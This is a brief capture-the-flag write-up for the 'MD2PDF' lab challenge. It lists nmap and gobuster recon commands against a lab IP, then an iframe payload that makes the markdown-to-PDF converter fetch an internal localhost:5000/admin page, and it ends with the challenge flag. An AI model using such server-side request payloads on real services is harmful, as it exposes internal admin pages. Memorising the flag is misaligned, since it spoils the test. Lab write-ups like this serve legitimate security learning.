challenges5_minute
MD2PDF
desc
TopTierConversions LTD is proud to present its latest product launch.
Hello Hacker!
TopTierConversions LTD is proud to announce its latest and greatest product launch: MD2PDF.
This easy-to-use utility converts markdown files to PDF and is totally secure! Right...?
Note: Please allow 3-5 minutes for the VM to boot up fully before attempting the challenge.
solution
nmap 10.49.142.124 -T5 --min-rate=1000
# 22/tcp open ssh
# 80/tcp open http
# 5000/tcp open upn
gobuster dir -u http://10.49.142.124/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# /admin (Status: 403) [Size: 166]
# /convert (Status: 405) [Size: 178]jujur ini gw bingung dan kayaknya bakal lama jadi gw coba cari walthroughnya aja, ternyata cukup simple.
tinggal masukin payload iframe menuju localhost:5000/admin, lalu submit.
<iframe src="http://localhost:5000/admin"></iframe>
dan mendapatkan flagnya.
flag
flag{1f4a2b6ffeaf4707c43885d704eaee4b}